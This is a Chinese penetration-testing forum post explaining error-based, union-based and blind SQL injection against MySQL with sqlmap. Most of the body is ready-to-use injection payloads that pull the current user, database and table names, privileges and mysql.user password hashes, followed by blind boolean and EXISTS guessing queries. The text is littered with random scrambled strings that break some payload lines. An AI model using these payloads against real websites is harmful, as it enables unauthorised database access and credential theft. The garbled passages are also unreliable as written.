中国网络渗透测试联盟

标题: sqlmap高级注入 [打印本页]
作者: admin    时间: 2013-7-16 20:31
标题: sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
0 z  e3 o: H1 o9 t
  j* C! e  G. q; f, W3 H. \' s这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
) B6 f' G! n/ q# R/ Y ; l# n% Y- N1 n6 Q" z6 F. s
分类标准        分类        备注
2 K' s! m0 g# W/ P7 a按字段类型        整型注入,字符型注入        6 }9 {6 Z) {# d( Z; R2 ^  _3 y
按出现的位置        get注入,post注入,cookie注入,http header注入        4 U2 G' b1 q' H3 b: g2 n, y
然而高级注入是这样的8 h5 z& ^& `2 m# U4 [5 V

5 M) d- i/ L9 n7 T高级注入分类        条件
% c) U2 k' n* }' j0 H+ @error-based sql        数据库的错误回显可以返回,存在数据库,表结构0 {; i" M# f  m6 t1 g. X0 E
union-based sql        能够使用union,存在数据库,表结构
* @" V) K& u! r+ F! fblind sql        存在注入) K! `! R! J9 t
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
8 V+ c/ t/ V8 F% p3 d# }. J' I
$ u7 s0 ?0 L) s7 q/ T好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
5 }+ x2 n, ^! H' x8 n. M* s$ ?
# `0 m3 ]% K6 w! Y' Q附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。& b: B, n* ]  z0 r& \! V( r

# g! c- M( O4 }: t" l这里用mysql说明+ T4 O) ^$ l! ^, ?$ }- C% c

1 ^, b( e- K. Y0 d2 L0 w4 U. m! T+ G' ge注入坛子里很多了,请看戳我或者再戳我
6 s# ?, D# _$ D* W) r/ r! I7 I
. F% n% f( }% b/ a, Eu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
% G& E4 K0 I: p3 g" E! x7 n% ^
  w* R0 K) h$ x/ P' K获取当前数据库用户名
3 q7 n/ O; |0 m. j1 f! |7 L : E/ E; _/ w7 `
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C) i% x* E( o$ @2 |
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
( Z) A  S, y) sL, NULL#3 L2 h! E5 \; Y0 F  `# ~" g
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
7 K/ C" i' Z* B! Y2 @" H
# q( e# g! e4 r& B获取数据库名
' V# V/ x+ v! ]) ]( q 9 K* F3 B1 ~: _+ L/ T' R4 b& S
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#7 j/ s. X: B/ g: _7 I( B/ K# z
获取所有用户名8 ]9 i( d& `* Q+ i
4 ]7 V% V0 c5 m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#! W" Q. {1 \$ p: Z8 C
查看当前用户权限
1 |: @- H0 `% s# @4 D- j$ A
" _! n9 W- k1 |* v+ y& \/ pUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#" `0 x, k! N! O( l3 t) s  a: E
尝试获取密码,当然需要有能读mysql数据库的权限
* }3 Y8 ?( w- o+ n2 ~- y   x- `. @! {# }: j
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
5 }. o# r, `4 {% e获取表名,limit什么的自己搞啦
: g2 z" I! c# P) @
: L3 Z7 u2 |4 B8 e4 cUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
; \# O$ _6 \/ V# O! C7 t2 \获取字段名及其类型. F- c! s: f( g8 f% R4 \& N
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
1 `( l2 \7 M+ g1 L$ a" e0 t$ e, K: K ! A5 t9 |- o6 N' [9 y
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。" D! o% n2 ~3 l5 b& F
% J6 v" Y. h7 B5 D+ O  m
如:% y: E4 `1 L( Q" `6 F8 v
获取当前用户名& g; H$ C; Y4 S9 D9 {5 `
7 y% J: _! K+ }' y$ H$ b
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1169 |, x1 g% L6 G9 x: @
获取当前数据库
! f! ^8 R2 o3 P7 x- B/ s& Z$ q 1 L5 I8 O0 s7 I
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106# Z! Z5 Z9 y" c+ v' g0 B/ _* J
获取表名! ^% g- B+ R9 Y
- E$ e0 z3 O$ V! G# E3 q& N
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 511 Z7 K, s: }/ K2 o8 Y2 q
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
( J2 c' u" Q% ?& A回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
/ ?6 a$ H7 @4 j爆表; N/ B. k5 j! L+ U, z5 K0 ]. i4 \5 x

0 Y* m: i9 W  W& M  k# hAND EXISTS(select * from table)# C; ]+ m) V5 f5 y1 H
爆字段) m4 l( F2 K/ s

) j. i$ |$ j8 d& vAND EXISTS(select pwd from table)
/ C' _7 |5 o* J' Y# u/ T. ~: I2 m盲注的变化就比较多了,由于篇幅,只是举个例子而已。: a. ^7 r7 t% B

9 y5 f2 [' n/ n' e7 a本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
; q5 Y9 y4 q- o0 t4 I



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2